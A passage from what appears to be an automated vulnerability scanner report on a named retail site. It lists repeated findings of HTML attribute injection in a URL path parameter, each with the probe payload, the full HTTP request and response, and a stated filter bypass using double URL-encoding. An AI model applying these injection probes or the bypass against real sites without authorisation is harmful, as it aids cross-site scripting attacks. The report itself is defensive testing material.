Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:00:19 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=ac_adapters&catLevel=2e4a25" a=b 1fa6aebdb9e&mc=&product_code=DR912A%23ABA&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.26. http://www.shopping.hp.com/can/computer/categories/carrying_cases/1/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/carrying_cases/1/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97d15%2522%2520a%253db%2520d29dd28c084 was submitted in the REST URL parameter 5. This input was echoed as 97d15" a=b d29dd28c084 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/carrying_cases/197d15%2522%2520a%253db%2520d29dd28c084/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:03:12 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=JYmRTMQRcqGkMJSKQnDv3N8wtcpgCh4Tt7nwvrcgh8nwmsflGnSp!-588465799; expires=Friday, 01-Jul-2011 15:03:13 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkjj9mX3At5NyHou1vfdgCe0ic%3D; expires=Friday, 28-Oct-2011 15:03:13 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:03:13 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=carrying_cases&catLevel=197d15" a=b d29dd28c084&mc=&product_code=XL173AA%23ABL&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.27. http://www.shopping.hp.com/can/computer/categories/carrying_cases/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/carrying_cases/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82720%2522%2520a%253db%25207bc3f9432bf was submitted in the REST URL parameter 5. This input was echoed as 82720" a=b 7bc3f9432bf in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/carrying_cases/282720%2522%2520a%253db%25207bc3f9432bf/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:03:38 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=MGvSTMQKWNGJFd1LslryjVSGTqkGldtpG1M1syLhkqdwxpXvcLRL!-588465799; expires=Friday, 01-Jul-2011 15:03:38 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkugtCR2g19NS3is1XceACa0ic%3D; expires=Friday, 28-Oct-2011 15:03:38 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:03:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=carrying_cases&catLevel=282720" a=b 7bc3f9432bf&mc=&product_code=XL173AA%23ABL&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.28. http://www.shopping.hp.com/can/computer/categories/digital_cameras/1/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/digital_cameras/1/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f08a9%2522%2520a%253db%2520866860460cb was submitted in the REST URL parameter 5. This input was echoed as f08a9" a=b 866860460cb in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/digital_cameras/1f08a9%2522%2520a%253db%2520866860460cb/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:02:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=RLVxTMQQZdm0ZTfZLvr4JrjPfPGY7jvJlhZBjlgk3rQhTjstypnJ!-588465799; expires=Friday, 01-Jul-2011 15:02:40 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkojNmT3g16MyHpvFvbeAWfnWvi; expires=Friday, 28-Oct-2011 15:02:40 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:02:40 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=digital_cameras&catLevel=1f08a9" a=b 866860460cb&mc=&product_code=WF984AA&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.29. http://www.shopping.hp.com/can/computer/categories/docking_solutions/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/docking_solutions/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3db6%2522%2520a%253db%2520d9288afb09c was submitted in the REST URL parameter 5. This input was echoed as f3db6" a=b d9288afb09c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/docking_solutions/2f3db6%2522%2520a%253db%2520d9288afb09c/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:02:58 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=j031TMQDnhJh0YD3dNpm0zQpLR1p76hLBVzg5f5ZQ7ng935v2hCM!-588465799; expires=Friday, 01-Jul-2011 15:02:59 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkviNCV0Q1wMivqvFrceAeWmmvi; expires=Friday, 28-Oct-2011 15:02:59 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:02:59 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=docking_solutions&catLevel=2f3db6" a=b d9288afb09c&mc=&product_code=VY844AA%23ABA&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.30. http://www.shopping.hp.com/can/computer/categories/home_theater_audio/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/home_theater_audio/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d66fb%2522%2520a%253db%252014827637c05 was submitted in the REST URL parameter 5. This input was echoed as d66fb" a=b 14827637c05 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/home_theater_audio/2d66fb%2522%2520a%253db%252014827637c05/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:02:03 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=JpXrTMPLbHg9LxJy2rzRJyBgFRBlTHcyd04NrC2FPXbMhdTXFjdj!-588465799; expires=Friday, 01-Jul-2011 15:02:03 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkuid6f2gt%2BMyzrs1PedASZ0ic%3D; expires=Friday, 28-Oct-2011 15:02:03 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:02:03 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=home_theater_audio&catLevel=2d66fb" a=b 14827637c05&mc=&product_code=GB0571&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.31. http://www.shopping.hp.com/can/computer/categories/memory/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/memory/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88c53%2522%2520a%253db%2520ea20a986a8 was submitted in the REST URL parameter 5. This input was echoed as 88c53" a=b ea20a986a8 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/memory/288c53%2522%2520a%253db%2520ea20a986a8/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 14:58:57 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=ZQv1TMPSDSdRNMLh6vVLvc6RcnJGQLnzBxCYs90knG2w85RqJL7v!-588465799; expires=Friday, 01-Jul-2011 14:58:58 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkqitGf2QJ%2FNCzjv1PZdAGbnWvi; expires=Friday, 28-Oct-2011 14:58:58 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 14:58:58 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=memory&catLevel=288c53" a=b ea20a986a8&mc=&product_code=AU740AA%23ABA&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.32. http://www.shopping.hp.com/can/computer/categories/mice_keyboards/1/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/mice_keyboards/1/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31611%2522%2520a%253db%2520ebc4cd8b604 was submitted in the REST URL parameter 5. This input was echoed as 31611" a=b ebc4cd8b604 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/mice_keyboards/131611%2522%2520a%253db%2520ebc4cd8b604/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:02:57 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=ThfhTMQBQ1QDnVpzpXCfMvyG9RPPssRfGnXdPJVzyvfW08LWGyQl!-588465799; expires=Friday, 01-Jul-2011 15:02:57 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlksidmV2QJ%2BNiDvuVPcdgee0ic%3D; expires=Friday, 28-Oct-2011 15:02:57 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:02:57 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=mice_keyboards&catLevel=131611" a=b ebc4cd8b604&mc=&product_code=KY619AA%23ABA&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.33. http://www.shopping.hp.com/can/computer/categories/mice_keyboards/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/mice_keyboards/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29f83%2522%2520a%253db%252007260e511e0 was submitted in the REST URL parameter 5. This input was echoed as 29f83" a=b 07260e511e0 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/mice_keyboards/229f83%2522%2520a%253db%252007260e511e0/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:02:52 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=xnBRTMQdWy2gvsX3r8J1Y6dmSrNWpTlpnkQPL4wgWWy8sGTMphKQ!-588465799; expires=Friday, 01-Jul-2011 15:02:53 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkuiNuR2Qt8NSvpvVbecQaX0ic%3D; expires=Friday, 28-Oct-2011 15:02:53 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:02:53 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=mice_keyboards&catLevel=229f83" a=b 07260e511e0&mc=&product_code=KY619AA%23ABA&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.34. http://www.shopping.hp.com/can/computer/categories/music_devices/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/music_devices/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8144d%2522%2520a%253db%2520081727802c1 was submitted in the REST URL parameter 5. This input was echoed as 8144d" a=b 081727802c1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/music_devices/28144d%2522%2520a%253db%2520081727802c1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:01:11 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=hDP9TMPXwJlTwwlc77GtcH0r9pfwGlVwmGLMf1GLSDfcS97yJpy1!-588465799; expires=Friday, 01-Jul-2011 15:01:11 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkvg9uT3gh%2BNiDuvlbfdQWWmGvi; expires=Friday, 28-Oct-2011 15:01:11 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:01:11 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=music_devices&catLevel=28144d" a=b 081727802c1&mc=&product_code=DP7789&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.35. http://www.shopping.hp.com/can/computer/categories/networking/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/networking/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9516%2522%2520a%253db%2520404b705c9ed was submitted in the REST URL parameter 5. This input was echoed as c9516" a=b 404b705c9ed in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/networking/2c9516%2522%2520a%253db%2520404b705c9ed/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:02:41 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=ZNpsTMQSFpmMZw6GkGyLMND04hlXm3HywzzjvGSyD8ypMvLVCf2L!-588465799; expires=Friday, 01-Jul-2011 15:02:42 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkug96X2A9xNS3ov1bYcQyX0ic%3D; expires=Friday, 28-Oct-2011 15:02:42 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:02:42 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=networking&catLevel=2c9516" a=b 404b705c9ed&mc=&product_code=GF4275&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.36. http://www.shopping.hp.com/can/computer/categories/notebook_batteries/1/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/notebook_batteries/1/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea87%2522%2520a%253db%25202a1c8b7492 was submitted in the REST URL parameter 5. This input was echoed as aea87" a=b 2a1c8b7492 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/notebook_batteries/1aea87%2522%2520a%253db%25202a1c8b7492/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:02:35 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=JpK6TMQLvXHFpJbwr1Y0zh2XytvY5CPh30Sny4Bn77hTLFz5zryS!-588465799; expires=Friday, 01-Jul-2011 15:02:35 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkvgtGR3A96Oi3sv1LWeASW0ic%3D; expires=Friday, 28-Oct-2011 15:02:35 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:02:35 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=notebook_batteries&catLevel=1aea87" a=b 2a1c8b7492&mc=&product_code=FZ441AA%23UUF&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.37. http://www.shopping.hp.com/can/computer/categories/notebook_batteries/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/notebook_batteries/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7324%2522%2520a%253db%2520b5b411d3a6 was submitted in the REST URL parameter 5. This input was echoed as a7324" a=b b5b411d3a6 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/notebook_batteries/2a7324%2522%2520a%253db%2520b5b411d3a6/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:02:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=CZwyTMQfQfvFrBkbKZw5g2lr7DT8p0Q5tpBkhSS7bwYTKkFTgw4K!-588465799; expires=Friday, 01-Jul-2011 15:02:55 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkjitme2gx5OyvivlvYdwOZ0ic%3D; expires=Friday, 28-Oct-2011 15:02:55 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:02:55 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=notebook_batteries&catLevel=2a7324" a=b b5b411d3a6&mc=&product_code=FZ441AA%23UUF&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.38. http://www.shopping.hp.com/can/computer/categories/photo_frames/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/photo_frames/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc5c%2522%2520a%253db%2520cbf4caecda2 was submitted in the REST URL parameter 5. This input was echoed as 4dc5c" a=b cbf4caecda2 in the application's response.

